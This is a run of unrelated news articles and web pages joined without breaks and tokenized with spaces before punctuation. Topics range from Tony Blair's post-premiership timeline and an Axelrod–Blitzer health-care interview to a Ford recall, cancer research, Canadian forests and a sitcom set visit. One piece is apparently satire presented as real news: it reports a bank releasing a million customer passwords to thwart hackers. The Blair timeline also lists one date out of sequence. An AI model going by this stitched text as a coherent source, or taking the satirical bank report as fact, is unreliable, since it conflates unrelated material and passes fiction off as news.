Even if Lisbon goes through , the return to office of a British Conservative government whose hostility to pooling even those elements of national sovereignty which give the EU 's members – including Britain – a greater global influence on issues from climate change to world trade , could pose real problems .
In that event , the argument goes , what better counterweight than having at the helm of the EU the one British figure capable when necessary , by influencing British public opinion in a contrary direction ?
" If you think it 's foolish to pull out of the European Defence Agency , " says Charles Grant , " if you think it 's idiotic not to participate in the external action service [ the new diplomatic network under the Lisbon Treaty ] and Blair is there to tell the British public so , then you 're going to think ' thank God for that ' . "
The implication is that if the Europeans want to avoid the big knock - down destructive fights with its second - biggest net contributor that characterised the Thatcher years , then having Blair in the most powerful EU job may be an insurance policy against it happening .
Back in Qalqilya Blair is focused solely on the job in hand .
He has given a mini-press conference with Mr Khandaqji in the Governor 's office , enlivened by a sharp exchange between a Palestinian journalist and the Governor himself about the journalist 's accusations of PA corruption .
On the wall behind him are portraits of Yasser Arafat and his successor Mahmoud Abbas .
In the street outside , watched approvingly by the Envoy 's plain - clothes British protection officers , two uniformed Palestinian police drivers park a pick - up and a blue and white police car behind his UN convoy , ready to escort him to his next stop and exemplifying the significantly enhanced security across the West Bank ordered by the Palestinian Prime Minister Salam Fayyad .
On this peaceful , sunny morning it's hard to remember that these are members of the force which killed a top Hamas commander in a shoot - out which left six Palestinians dead in the city in May .
Unfazed by the increasingly - heated argument inside the room , Blair wraps it up , as he must have countless discussions in the British Cabinet , by remarking with a grin that " we 're unlike to reach an agreement on this now " .
He still shows every appearance of being engaged by the job here , remarking two days later that it would be a " profound mistake " to think that with US engagement , relative quiet in Gaza and a " little bit of progress in the West Bank " you could just say well , OK , lets take the pressure off everybody and ... carry on as we were .
This is building up to a point where the energy needs to be channelled into a clear way forward . "
If it is n't so channelled , he adds with some understatement , there will be a " problem " .
So the question is not so much " whither Blair ? " but " whither Europe ? "
Blair , who would presumably not drop his interest in this region if he became the EU president , would surely like the job , but not so much that he is launching a public campaign for it .
And he is far from being the ideal candidate from the point of view of the European left .
But if Europe is to fulfil the goals of Lisbon , the left is not spoilt for choice .
The danger of the coming argument on his eligibility for the job is that it may avoid the biggest question of all , which may not be posed again for a generation : what sort of Europe does Europe want ?
MacShane argues that " big Europeans from Churchill to De Gaulle to [ former European Commission President Jacques ] Delors " all had their faults but also " the vision and communication thing which even Tony 's bitterest enemies can't deny he has .
Blair believes passionately in Britain and has equal faith in Europe .
And faith and passion are not in abundant supply in the eBay of European leadership . "
After Downing St : What Tony did next
27 June 2007
Resigns as Prime Minister of Great Britain and Northern Ireland after 10 years in office .
On the same afternoon he is officially confirmed as the Middle East envoy for the United Nations , the European Union , the United States and Russia .
26 October 2007
Signs a deal with Random House to write his memoirs for a fee thought to be in the region of £ 5 m .
14 November 2007
Opens the Tony Blair Sports Foundation to nurture young sporting talent in areas suffering social exclusion .
21 December 2008
Leaves the Anglican Church to become a Roman Catholic , after a meeting with Pope Benedict XVI on one of his final official trips while PM .
9 January 2008
JPMorgan Chase confirm that Blair will be joining the investment bank in a " senior advisory capacity " .
He also advises Zurich Financial Services on climate change , pushing his combined earnings beyond £ 7 m a year .
7 March 2008
Yale University announce that Blair will teach a course on issues of faith and globalisation as a Howland Distinguished Fellow .
His aides express concern at his ever - increasing workload .
14 March 2008
Launches his " Breaking the Climate Deadlock Initiative " in partnership with the not - for - profit organisation , Climate Group .
He commissions a team of scientists from Cambridge University to examine the likely econ-omic consequences of climate change .
26 May 2008
Cherie 's autobiography , " Speaking for Myself " , is published .
In it , she confesses that she fell in love with Tony on the top deck of a bus , saying : " It was a double - decker and we went upstairs .
It was completely empty and by the time we got off we knew each other better than when we'd got on . "
30 May 2008
At the launch of his new Faith Foundation in New York Blair says he wants to spend the rest of years ensuring that religion is seen as a force for good in the world .
22 May 2008
Queen 's University Belfast award the former prime minister an honorary law doctorate for distinction in public service and for his role in the Northern Ireland peace process .
3 May 2008
With his wife Cherie , Blair adds a £ 4 m stately home in Buckinghamshire to his property portfolio , which also includes to two houses in London , two flats in Bristol and his former constituency home in Durham .
7 November 2008
Actor Ioan Grufford plays Tony Blair in Oliver Stone 's Bush biopic " W " , becoming the fourth actor to play him in a major TV or film production .
13 January 2009
President George W Bush awards his closest ally in the War on Terror the Presidential Medal of Freedom , America 's highest civilian honour , in a ceremony at the White House .
5 February 2009
Blair beats
Brown to be the first world statesman to meet and shake hands with President Obama as he delivers the key - note address at a Washington prayer breakfast .
Obama calls Blair " my very good friend " .
April 2009
Blair lists his home as " Jerusalem " in the VIP visitors ' guest book at the British Embassy in Washington .
17 May 2009
Tel Aviv University awards Blair the Dan David prize for leadership for " achievements having an outstanding scientific , technological , cultural or social impact on our world " .
Blair donates the £ 1 m prize to the Tony Blair Faith Foundation and to the university .
8 September 2009
Appears on " The Late Show with David Letterman " in New York , saying it was " right to stand shoulder to shoulder with America " during the War on Terror .
Midway through the interview six topless men , who had the word " MAGGIE " spelt out on their chests , storm out of the studio in mock disgust , apparently upset it was Tony Blair and not Margaret Thatcher who was making an appearance .
22 September 2009
Blair 's official spokesman denies Liberal Democrat claims that he may have known about British complicity in the torture of terrorist suspects abroad .
JAMIE MERRILL
Give Wolf Blitzer of CNN credit for a hard - hitting question in his interview yesterday with David Axelrod before Barack Obama ’s speech to the joint session of Congress .
In fact , Blitzer did n’t just ask Axelrod a tough question , he kept coming back to it when Axelrod proved incapable of answering it .
The big $ 64 trillion question ?
If Obama wants competition in states where one insurer dominates , why not just allow insurers to sell policies across state lines ?
Er …. maybe because they do n’t really want competition at all ?
( via Duane Patterson )
BLITZER : Including what they call the cooperative option , a series of health insurance cooperatives that would n’t be the public option , but would be some — something in between ?
Is that — is he going to get into a detail like that and say he likes that idea ?
AXELROD : He will acknowledge the fact that — that there is that idea .
There ’s the idea of putting a trigger on the public option so that it goes into effect at some date when it ’s clear that — that a market is uncompetitive .
There are a number of ideas .
But what is very important is that we have the kind of competition and choice that will help consumers .
In many states in this country , there ’s one insurer that dominates the entire market .
In Alabama , one insured dominates 87 percent .
In North Dakota , there ’s one insurer that dominates …
BLITZER : So why not break down …
AXELROD : … the market almost completely .
BLITZER : Why not break down the state barriers and let all of these insurance companies compete nationally without having to simply focus in on a state by state basis ?
AXELROD : Because we are trying to do this in a way that advances the — the interests of consumers without creating such disruption that it makes it difficult to to move forward .
BLITZER : Why would that be disruptive ?
If Blue Cross and Blue Shield or United Health Care or all of these big insurance companies , they do n’t have to worry about just working in a state , they could just have the opportunity to compete in all 50 states ?
AXELROD : But insurance is regulated at the — at this time , Wolf …
BLITZER : But you could change that .
The president could propose …
AXELROD : … state by state .
BLITZER : The president could propose a law …
AXELROD : That is not …
BLITZER : … changing that .
AXELROD : That is not endemic to the kind of reforms that we ’re proposing or that …
BLITZER : Why not ?
AXELROD : … that …
BLITZER : Why not ?
AXELROD : …we think — we ’re proposing a package that we believe will bring that stability and security to people , it will help people get insurance , it will be — it will lower the costs and that can pass the Congress .
And that has to be the test .
We ’re not into a symbolic expedition here .
We ’re trying to bring real relief to hardworking middle class people in this country .
We believe the plan that we ’ve outlined will do that .
BLITZER : Because I want to move on , but if the president wanted great competition — greater competition — he could say let ’s change the law and let these health insurance companies compete nationally .
AXELROD : I ’m not sure , Wolf , that that would — that that would end the debate that you asked me about in the first place .
And , you know , I think that the idea that he ’s proposal will promote that .
Others have other ideas .
But they are not central .
What ’s central here is that we get fundamental insurance reforms that will protect people , put a cap on their out of pocket expenses if they have preexisting conditions , make sure they get insurance if they get sick , make sure they do n’t get dropped off insurance and will a pool where people who ca n’t get insurance today — you know , if you do n’t have insurance through your employer , it costs you three times as much to get insurance today .
Most people ca n’t afford it .
Most small — small businesses can’t afford to insure their employees .
A lot of people wo n’t start a small business because they can’t leave their insurance .
Our plan would help cope with that .
The world ’s greatest big wave surfers are traveling around the world in the hopes of surfing the biggest waves and winning the 2010 Billabong XXL Global Big Wave awards .
As winter swells pound the Southern Hemisphere , a crew of surfers got a jump on the competition by submitting their most recent work from notorious big wave break , Dungeons , in South Africa .
Brazilian Maya Gabeira tapped into a monster and rode what is considered the largest wave ever ridden by a woman .
Big ups to Maya .
Let the insanity begin !
Maya Gabeira Charges Dungeons
— — –
NEWPORT BEACH , CA – A mad dash from their homes in Rio de Janeiro , Brazil to Cape Town , South Africa paid off for Maya Gabeira and tow surfing partner Carlos Burle as they rode the biggest waves of the season at the notorious Dungeons break this week .
Photos of the South American pair in action are now among the leading contenders in the Biggest Wave category of the 2010 Billabong XXL Global Big Wave Awards presented by Monster Energy .
The entered images may be viewed at the event website at the BillabongXXL website .
Also captured challenging some massive walls at the infamously sharky break were Grant “ Twiggy ” Baker , Andrew Marr and Greg Long .
All three have either won or been finalists in the XXL Awards in recent years .
Gabeira , 22 , has already won the Billabong Girls Best Performance Award three years running , but on August 11 she reaffirmed her status as the top female in big wave surfing when she charged down an enormous , bumpy face after being towed in by Burle on a personal watercraft .
The duo arrived in Africa five days ahead of the giant swell in order for Gabeira to obtain her skipper ’s license to legally operate the jet - powered craft .
According to Gabeira , “ My days previous to the big day were the biggest mission ever !
The swell came with onshore winds which the waves and ocean bumpy .
But in the end of the day everyone had managed to get some bombs and safely finish a day of big surf .
“ My biggest wave was just one drop and had a crazy boil in the face that I managed to jump through it , ” said Gabeira .
“ It was exciting to get that much speed down the face and manage to make such an irregular wave on my backside .
Thanks to Carlos I had the biggest waves of my life that day ! ”
Gabeira was able to return the favor , putting her new driver ’s license to work and towing Burle into his share of monsters along the spooky offshore reef .
The tenth annual Billabong XXL Global Big Wave Awards season runs through March 19 , 2010 and acknowledges the biggest and best ridden waves of the year based on the photographic evidence .
Additional entries have also been arriving daily from around the world in all the key event categories including Monster Paddle , Monster Tube and the $ 50,000 XXL Ride of the Year .
In addition to all the latest entries in each category , full event details including formats , rules and archives of past XXL years can be seen at the event website at the BillabongXXL website .
Little Rock , Arkansas – Third American Bank and Trust of Arkansas announced that the company had released one million customer account numbers and passwords in a preemptive move against attacking hackers .
The bank had noticed suspicious activity on its internal network on Saturday , and determined that hackers had breached their outer layer of security .
Fearing hackers would penetrate the bank 's final layers of security , head of account security , Tom Dankman , ordered all customer accounts and passwords made public .
" It was inevitable that the hackers would gain access .
It was just a matter of time , " said Dankman .
" By releasing our customers ' private information out into the wild , we decrease the value of the information to the hackers tremendously .
As a result the hackers stopped their attacks on our system almost immediately . "
Related News Security Training Wo n't Take Effect Until Microsoft Restarts Security Breach Traced to Hole in Head of Admin MacGyver Foils Airport Security Security experts doubt that other banks will use this strategy to stop hackers .
Laura Sizemore of Interbank Consulting and Security said , " This method is a first for me .
We 've seen banks pull the plug on their computers , and even put all their customers ' cash into sub - prime mortgages to stop hackers , but never this . "
Customers of the bank were confused by the move .
" So you 're saying that the bank just gave everyone our account numbers and passwords ?
That 's brilliant .
At least I had half of my money at Fourth American Bank and Trust , " said Ted Barker of Little Rock .
Officials at Fourth American Bank and Trust of Arkansas said they too were targeted by hackers , but did n't do anything as dumb as giving out private customer data .
" We just zeroed out everyone 's balance , " said Homer Strickland , Security Chief and janitor .
" Great , " said Barker .
Both Third and Fourth bank 's stock were down on the news .
Story Options : Related Share Print
The 10:10 movement supported by the Guardian is a wonderful way to empower ordinary people to participate in the great movement of mitigating global warming .
We cannot wait until governments are enlightened enough to legislate and cap the carbon emissions .
Matters are urgent .
We have to act now , without any delay .
The power of public opinion and citizen action will have a strong impact on the climate conference taking place in Copenhagen .
One thing we can easily do to achieve this goal : we can declare Sunday to be a fossil fuel - free day or a low - carbon day or at least an energy - saving day .
We can start this week , this month or in 2010 .
We can start individually and collectively .
The long journey to cut carbon dioxide emissions can start in the here and now .
Not long ago Sunday used to be a day of rest , a day of spiritual renewal , a day for families to come together , but we have changed Sunday from a day of rest to a day of shopping , flying and driving .
However , in the context of excessive carbon dioxide emissions into the atmosphere , which are bringing catastrophic upheavals , we can and should restore Sunday to a day for Gaia , a day for the Earth .
There will be no great hardship in cutting down all non-essential and non-urgent use of fossil fuels for one day a week .
We can easily close supermarkets , department stores and petrol stations .
We can reduce our mobility to the bare essentials and without harming the economy in any way .
We can enjoy Sunday once more with our family and friends .
We can engage in gardening , writing , painting , walking , baking bread or simply spending time in contemplation .
This will be good for our personal health as well as for the health of the planet .
We will have time for our friends , time to play with our children and time for the family .
At a stroke , we can reduce 10 % of our carbon emissions into the atmosphere by making Sunday a low - carbon day and at the same time make ourselves healthier and happier .
So , let us make Sunday a day of rest and renewal rather than a day of travel and toil .
Global warming or climate change is only a symptom of our deep - seated desire to consume , consume and consume .
The external problem of carbon emissions is connected with the internal problem of desire .
If we stay in the rat - race 24 hours , seven days a week , we are bound to pollute our inner space as well as the outer space .
Speed is the curse of modern civilisation .
The solution to global warming is simple : slow down .
Slow is beautiful .
Even if we cannot slow down every day , at least slow down on Sunday .
If you are a Christian then Slow Sunday should be natural to you , if you are a Muslim make Friday your low - carbon day , if you are Jewish then Saturday can be your day to save energy , if you follow a secular way of life then choose your own carbon - free day .
At least on Sunday we can be citizens rather than consumers .
• Satish Kumar is the the editor of Resurgence magazine
• You can sign up for 10:10 at www.1010uk.org
" First the president bought Highfield .
Hordes of people were brought into another farm in open trucks and gathered all the workers , and told them it now belongs to ARDA , " he said .
" Those who did n't want to work for ARDA were beaten up and told to leave the farm , and the invaders started staying in the houses . "
Experienced Family Law And Divorce Attorney In San Diego
Life is unpredictable .
Sometimes it is downright cruel and overwhelming , despite your most determined efforts to manage it .
Helping you regain perspective and control after a serious setback or difficult period — by finding the most practical , cost - effective legal solution — is what we are all about at the Law Offices of Samuel S. Godkin & Associates .
If you are dealing with a divorce , or any divorce - related issues , such as child custody and visitation or financial issues , contact Samuel S. Godkin , San Diego ’s premier family Law Attorney .
We ’ll give you an honest opinion and analysis about your case .
Proven , Practical Divorce And Family Law Representation From Our North County Child And Spousal Support Lawyer
Attorney Samuel Godkin has been practicing law in the San Diego , California , since 1996 , with a constant focus on family law and divorce , including child custody and visitation and child support .
He helps people across the full economic and cultural landscape , working with a strong circle of other lawyers and experts in the field .
Attorney Godkin believes in focusing his law practice on a few areas to ensure that he can provide the competent and experienced legal guidance that his clients deserve .
There are lawyers who love to go to court because the fees pile up fast in a contested case .
Some are aggressive in bringing conflict to a head , whether or not that is in your best interest .
Others are passive about offering guidance on tough issues .
These are some of the traits and patterns we avoid .
We See The Big Picture And Strive To Keep Legal Costs Down When Filing for Divorce In California
Mr. Godkin , and other attorneys with whom he works , shares a passion for big - picture problem - solving .
That means we will :
Objectively evaluate your case when it comes to determining which issues to pursue aggressively and which issues are not worth your time or money
Be analytical and objective as we find ways to accomplish what you want while keeping costs down
Maintain a focus on helping you get through a crisis and start putting your life back in order
In family law and divorce matters , we drive toward fair , constructive settlements through negotiation or mediation whenever possible .
At the Law Offices of Samuel S. Godkin and Associates , we believe in handling your case the right way from the outset , on the principle that if it ’s worth doing , it ’s worth doing right the first time .
Call 619-573-4193 or e-mail our North County child and spousal support attorney today for a personal consultation focused squarely on your problems and priorities .
I hate to write about this , but I have actually been to this play before and it is really disturbing .
I was in Israel interviewing Prime Minister Yitzhak Rabin just before he was assassinated in 1995 .
We had a beer in his office .
He needed one .
I remember the ugly mood in Israel then  a mood in which extreme right - wing settlers and politicians were doing all they could to delegitimize Rabin , who was committed to trading land for peace as part of the Oslo accords .
They questioned his authority .
They accused him of treason .
They created pictures depicting him as a Nazi SS officer , and they shouted death threats at rallies .
His political opponents winked at it all .
And in so doing they created a poisonous political environment that was interpreted by one right - wing Jewish nationalist as a license to kill Rabin  he must have heard , “ God will be on your side ”  and so he did .
Others have already remarked on this analogy , but I want to add my voice because the parallels to Israel then and America today turn my stomach : I have no problem with any of the substantive criticism of President Obama from the right or left .
But something very dangerous is happening .
Criticism from the far right has begun tipping over into delegitimation and creating the same kind of climate here that existed in Israel on the eve of the Rabin assassination .
Arsenal Station is licensed under Creative Commons Attribution - Noncommercial - No Derivative Works 3.0 United States and United Kingdom Licenses .
If you would like to reproduce or quote any content from Arsenal Station in any type of for - profit media , please contact : arsenalstation@hotmail.co.uk
The Obama Administration has lashed out at the Goldstone Report early and often since its release , condemning it as “ one - sided , ” “ deeply flawed , ” and “ unfair . ”
Richard Goldstone
South African Judge Richard Goldstone , the author of the report , would like to know why , publicly challenging President Obama today to come up with some specific problems with the report .
The report successfully moved through the UN Human Rights Council last week , despite US opposition , and has been referred to the UN Security Council for consideration .
The US has vowed to use its veto power in the Security Council to prevent the report from going any farther .
The Goldstone Report was heavily critical of both the Israeli and Hamas governments for their behavior during the war in the Gaza Strip , and accused both sides of war crimes .
Israel refused to provide any official access to those working on the report , and has since accused Goldstone , a self - described Zionist , of being an “ anti-semite . ”
The US opposition so far has been without substantial particulars , and appears to be of the “ Israel is our ally ” variety all too common with recent administrations .
It is unclear if officials will respond to Goldstone ’s request for specific complaints .
Safest hybrid cars View photos
These five ultra-efficient vehicles have earned the Insurance Institute for Highway Safety 's Top Safety Pick Award .
Quick Vote
What do you think is the most important quality in a job ?
Satisfying work
Good pay and benefits
Flexible hours
Growth opportunities or View results
NEW YORK ( CNNMoney.com ) --
Ford issued the largest single recall in its history Tuesday as drivers of an additional 4.5 million vehicles were alerted about a fire hazard from a faulty switch .
The National Highway Traffic Safety Administration said this was the eighth recall , involving a total of 16 million Ford Motor ( F , Fortune 500 ) vehicles , concerning the cruise control deactivation switch manufactured by Texas Instruments ( TXN , Fortune 500 ) .
The faulty switch can leak hydraulic fluid , overheat , smoke and then burn , and risks causing a fire even when the ignition is turned off , parked and unattended , the NHTSA said .
The risk is elevated for 1.1 million Windstars that were subject to a government investigation , said Ford spokesman Wes Sherwood .
" We determined with the government that there is a low risk of fires for those vehicles , " Sherwood said .
" The other 3.4 million vehicles are the remaining vehicles that have the Texas Instrument switch , so we 're recalling them to reassure customers and prevent future recalls . "
Sherwood added that Ford has always gone beyond recalling only the cars that present a risk .
While the company does not discuss its current suppliers , Sherwood said that Ford vehicles did not use the Texas Instrument switch in post -2003 models .
NHTSA said Ford drivers should look for warnings of possible imminent fires , including malfunctioning cruise control systems and brake lights and antilock braking system and brake light warnings on the dashboard .
The safety agency also said difficulty in getting the vehicle out of the park mode should be treated as a warning .
" I urge customers to pay attention to this warning and bring the affected models in to have them repaired as soon as possible , " said Transportation Secretary Ray LaHood , in a statement .
Ford is notifying customers and instructing them to take vehicles to dealers for a complimentary installation of a fused wiring harness that will eliminate the risk of fires , the NHTSA said .
The safety recall is expected to begin around Oct. 26 .
Owners may contact Ford at 1-800-392-3673 or NTHSA 's vehicle safety hotline at 1-888-327-4236 or visit http://www.safercar.gov.
Tuesday 's recall includes the following Ford models : 1995 - 2003 Windstars , 2000 - 2003 Excursion diesels , 1993 - 1997 and 1999 - 2003 F - Super Duty diesels , 1992 - 2003 Econolines , 1995 - 2002 Explorers and Mercury Mountaineers , 1995 - 1997 and 2001 - 2003 Rangers and 1994 F35 motorhomes .
The Palace of Westminster is seen in London October 12 , 2009 .
REUTERS / Kieran Doherty
LONDON ( Reuters Life ! ) - Britain has been designated the worst place to live in Europe , compared with nine other major countries , despite the fact that Brits earn by far the highest wages .
Life in sun-soaked Spain or in France , where people retire earlier and live longer , was judged to be the best by researchers at uSwitch.com in the latest European Quality of Life index .
Earning 35,730 pounds ( $ 56,410 ) a year on average , Brits are 10,000 pounds ( $ 15,790 ) richer than their European neighbors , but that does n’t translate into an easier life and they are getting a “ raw deal ” researchers concluded .
Shoppers in Britain pay higher prices for fuel , food , alcohol and cigarettes and receive poorer healthcare and education , the survey found .
“ There is more to good living than money and this report shows why so many Brits are giving up on the UK and heading to France and Spain , ” said Ann Robinson , Director of Consumer Policy at uSwitch.com .
“ We have lost all sense of balance between wealth and well - being , ” she said .
British workers toil three years longer and die two years younger than their French counterparts .
The Spanish enjoy 2,665 hours of sunshine a year , compared with just 1,397 in Ireland and they pay five percent less taxes than their light - deprived Irish cousins .
The 10 major countries surveyed were ranked in the following order from best to worst quality of life : France , Spain , Denmark , the Netherlands , Germany , Poland , Italy , Sweden , Ireland and Britain .
This chart shows current worldwide annual prevalence of cocaine in population aged 15 - 64 .
Number of people who used cocaine at least once in year : 15 - 19.3 million people ( equivalent to 0.3 % to 0.4 % of the population ) worldwide
Cocaine has been a popular recreational drug for decades , and while demand appears to be on the wane in its largest markets , it has gained popularity in an ever widening range of countries .
' Cocaine ' comprises at least two distinct drug products : powder cocaine on the one hand , and a range of cocaine base products , mostly falling under the heading of ' crack ' , on the other .
Powder cocaine produces a more subtle effect , is more expensive to use , and has become emblematic of economic success in some circles .
Demand has emerged in many developing countries , particularly among elites .
Crack is cheaper , more intense , and associated with prostitution and street crime .
Traditionally , crack use was rare outside the United States of America and the United Kingdom , but this also appears to be changing , especially in Latin America and parts of Africa .
According to United Nations Office on Drugs and Crime ( UNODC ) the new estimates – like those reported for previous years - suggest that the largest market is still North America , followed by West and Central Europe and South America .
Compared to previous year , the range shifted to lower levels , suggesting a decrease in the global number of cocaine users .
This change is due to the decrease in the number of cocaine users in North America .
In addition , missing data and / or absence of recent reliable estimates affect many regions , particularly East Africa , Central Asia , the Near and Middle East and South Asia .
For more information please follow the reference link below .
A tumor - suppressing protein snatches up an important cancer - promoting enzyme and tags it with molecules that condemn it to destruction , a research team led by scientists at The University of Texas M. D. Anderson Cancer Center reports this week in the journal Molecular Cell .
" KEAP1 is a recently discovered tumor suppressor , but how it works has not been known .
IKKß is a known oncoprotein that promotes cancer in at least two different ways , but we did not know how it was regulated .
We think we 've answered both questions with this research , " said senior author Mien - Chie Hung , Ph.D. , chair and professor of M. D. Anderson 's Department of Molecular and Cellular Oncology .
The researchers showed that KEAP1 , short for the tongue - twisting Kelch - like ECH - associated protein 1 , binds to IKKß and attaches molecules known as ubiquitins to the oncoprotein , which targets it for dissolution by the cell 's proteasome complex .
They also showed that underexpression of KEAP1 is associated with poor survival among breast cancer patients , and that it 's mutated and inactivated in some breast , liver , lung and colon tumors .
" KEAP1 underexpression or inactivation is involved in multiple cancers , so we are working now to identify its activation mechanism , which could lead to development of new anti-cancer drugs , " Hung said .
He and his colleagues also want to know whether KEAP1 works on other known oncoproteins .
Blocking overexpression of IKKß , short for IkB kinase ß , is crucial for at least two reasons .
Hung and colleagues have shown that the protein inhibits at least two other important tumor suppressors .
More importantly , IKKß activates the NF ?
B ( nuclear factor ?b ) signaling pathway , which regulates expression of genes involved in the immune response , cellular proliferation , growth of new blood vessels , cell survival , tumor invasion , and the lethal spreading of cancer known as metastasis .
advertisement
Hung and colleagues first demonstrated that the presence of KEAP1 inhibits the NF ?
B signaling pathway and then conducted a series of experiments to find out how that happens .
They found that depletion of KEAP1 leads to the accumulation of IKKß , and then discovered that the tumor suppressor binds to a specific site on IKKß , capturing it to feed it to the proteasome .
Hung likens this snatching of IKKß to plucking stuffed animals with a mechanical claw out of an arcade game , imagery that wound up on the cover of Molecular Cell .
KEAP1 is a ubiquitin ligase that attaches to the target protein and works in a complex with another protein , CUL3 , that connects the ubiquitins to the bound protein .
The team analyzed both KEAP1 and CUL3 expression in the tumors of 119 breast cancer patients and correlated the findings to overall survival .
They found that underexpression of KEAP1 alone was associated with poor survival .
Patients with strong expression of both KEAP1 and CUL3 had an 80 percent survival rate at five years while those with little expression of either had a 43 percent 5 - year survival rate .
Next , they sequenced KEAP1 's genes in 26 cancer lines ( 18 breast , four liver , four lung ) and in 119 primary tumors ( 17 breast , 78 liver , 13 lung , 11 colon ) and found two functional genetic mutations that shut down the protein 's ability regulate IKKß .
The mutations affected the portion of the protein that binds to IKKß .
The research in this paper was funded by grants from the National Cancer Institute , including M. D. Anderson 's Specialized Program in Research Excellence ( SPORE ) grants in breast , pancreatic and ovarian cancers , the Breast Cancer Research Foundation , Kadoorie Charitable Foundations , Patel Memorial Breast Cancer Endowment Fund , the National Breast Cancer Foundation , and by the Taiwan National Science Council .
Hung noted that first author Dung - Fang Lee , Ph.D. , led his lab 's research on IKKß as a doctoral candidate in The University of Texas Graduate School of Biomedical Sciences at Houston , a joint program of M. D. Anderson and The University of Texas Health Science Center at Houston .
Lee received the GSBS Alfred Knudson Jr. Outstanding Dissertation Award when he graduated last year .
Lee is now a postdoctoral fellow at Mount Sinai School of Medicine in New York .
Co-authors with Lee and Hung are Hsu - Ping Kuo , Ph.D. , Mo Liu , Chao - Kai Chou , Ph.D. , Weiya Xia , M.D. , Yi Du , Jia Shen , Chun Te Chen , Longfei Huo , Ph.D. , Ming - Chuan Hsu , Ph.D. , Chia - Wei Li , Ph.D. , and Qing - Qing Ding , all of M. D. Anderson 's Department of Molecular and Cellular Oncology ; Kuo , Liu , Chou , Du , Shen , and Chen are also students in the GSBS .
Also , Tsai - Lien Liao , Ann - Chi Lin , Ya - Hui Chang , Shih Feng Tsai , M.D. , Ph.D. , all of the Division of Molecular and Genomic Science , National Health Research Institutes , Taiwan ; Chien - Chen Lai , Ph.D. , Division of Molecular and Genomic Medicine , National Health Research Institutes , and the Graduate Institute of Chinese Medical Science , China Medical University , both in Taiwan ; and Long - Yuan Li. , Ph.D. , Center for Molecular Medicine and Graduate Institute of Cancer Biology , China Medical University and Hospital , and Asia University , both in Taiwan .
In the far north latitudes , buried within a seemingly endless expanse of evergreen forests , the authorities in Canada are building up one of the world 's best natural defences against global warming .
In a series of initiatives , Canadian provincial governments and aboriginal leaders have set aside vast tracts of coniferous woods , wetlands , and peat .
The conservation drive bans logging , mining , and oil drilling on some 250 m acres – an area more than twice the size of California .
The sheer scale of the forest conservation drive is somewhat of an anomaly for Canada , whose government has been accused of sabotaging the global climate change talks by its development of the Alberta tar sands and its refusal to make deep cuts in its greenhouse gas emissions .
Last week , a former adviser to Barack Obama urged Canada to do more to keep up with America 's moves towards a cleaner energy economy .
In the latest addition to the carbon storehouse , the provincial premier of Manitoba , Gary Doer , this month announced a $ 10 m ( £ 5.6 m ) Canadian fund to protect a 10.8 m acre expanse of boreal or evergreen forest .
It was one of Doer 's last acts as premier ; he took over as Canada 's ambassador to Washington this month .
The $ 10 m will go towards efforts by indigenous leaders to designate boreal forest lands in eastern Manitoba as a Unesco world heritage site .
The Pimachiowin Aki world heritage project , which straddles the Manitoba - Ontario border , extends efforts by Canadian provincial leaders to protect the wide swaths of pristine forests in the north .
It also ensures the survival of one of the best natural defences against global warming after the world 's oceans , environmentalists say .
A report by the International Boreal Conservation Campaign said the forests , with their rich mix of trees , wetlands , peat and tundra , were a far bigger carbon store than scientists had realised , soaking up 22 % of the total carbon stored on the earth 's land surface .
" If you look across Canada one of [ the boreal forest 's ] great values to us globally is its carbon storage value , " said Steve Kallick , director of the Pew Environment Group 's International Boreal Conservation Campaign .
" There is so much carbon sequestered in it already that if it escaped it would pose a whole new , very grave threat . "
Canada 's cold temperatures slow decomposition , allowing the build - up of organic soil and peat .
The forest floors beneath its evergreens hold twice as much carbon per acre as tropical forests , such as the Amazon .
It is unclear how long Canada 's forests can continue to serve as carbon vaults .
" As the climate warms , the place is going to dry up .
There will be a problem with insect infestation .
There is going to be increased natural carbon release due to fire or wetlands drying up , " said Sue Libenson , a spokeswoman for the International Boreal Conservation Campaign .
But she added : " The general premise is that there is still a hell of a lot of carbon in there . "
Its release would be a climate catastrophe .
Canada 's 1.3bn acres of boreal forest store the equivalent of 27 years ' worth of current global greenhouse gas emissions , a Greenpeace study found .
The destruction of those forests , scientists warn , would be like setting off a massive " carbon bomb " because of the sudden release of emissions .
That threat appears to have concentrated the official mindset in Canada , which otherwise has a poor record on action on climate change .
On a per capita basis , the country is one of the worst polluters on the planet , producing about 2 % of the world 's emissions even though it has just 33 m people .
It holds one of the worst track records among industrialised states for living up to its commitment under the Kyoto accords .
By 2007 , greenhouse gas emissions were 34 % above the target Canada agreed at Kyoto .
Canada 's prime minister , Stephen Harper , is resisting doing much more , committing to just a 6 % cut over 1990 levels of greenhouse gas emissions by 2020 .
" I see Harper 's policy as a continuation of the Bush agenda , " said David Martin , climate director for Greenpeace Canada .
A key advisor to Obama made a similar point last week , comparing Canada 's current climate change policy to the inaction in America under George Bush .
" The Canadians would be well served by keeping up with what 's going on in the United States with respect to this push towards clean technology , " John Podesta , who oversaw Obama 's transition team , told a conference in Ottawa .
Environmentalists also fear that Harper intends to exclude the Alberta tar sands – the heavy crude deposits that have fuelled the rise in emissions – from any future greenhouse gas emissions regime .
But the Harper government did relent on forest protection , working with the Sahtu and Deh Cho First Nations to set aside 40 m acres in the Northwest Territories .
Canadian provincial leaders have moved even more aggressively in recent years , with Ontario committed to protecting 55 m acres , or about half of its forest , and Quebec committed to protecting 150 m acres .
" Canada is torn between wanting to promote the tar sands and make money off it now , and wanting to live up to its promises under the Kyoto accord .
But as far as protecting carbon rich ecosystems , particularly the boreal forest , Canada is a world leader , " said Kallick .
Photo : Art Streiber
Neil Patrick Harris is kissing the actress Cobie Smulders .
It ’s an intimate kiss , eyes closed , complete with low moans .
The pair embrace on a New York City stoop , on the Los Angeles set of the CBS sitcom How I Met Your Mother , which returns to the air next Monday .
It ’s a cool , late - summer night .
“ It feels like New York weather , ” says Josh Radnor , who plays Ted , the nice - guy lead , as they prep the next take .
The show is by design
Ted ’s story , told to his children , but this season the great romance belongs to his friend Barney , played by Harris .
Four seasons ago , Barney was a mere comic sidekick , but Harris ’s performance has turned him into a larger - than - life figure , a suit - fetishizing horndog whose catchphrases ( “ Legen — wait for it ! — dary ” ) are printed all over CBS swag and who even has his own spin - off book , The Bro Code .
Now he ’s moving into deeper waters , struggling with what it might mean to have more than just another one - night stand .
In the scene they ’re filming , Barney is trying to behave like a boyfriend — learning , like Pinocchio , to be a real boy .
Again and again , the actors kiss .
A writer adds a punch line about breasts pointing two different ways , and Harris incorporates it , getting laughs from the crew .
The director takes Harris ’s hands and poses them on Smulders ’s legs .
Between takes , the two of them banter .
“ Your mikes look very beautiful , pressed together , ” Harris says as technicians adjust the audio .
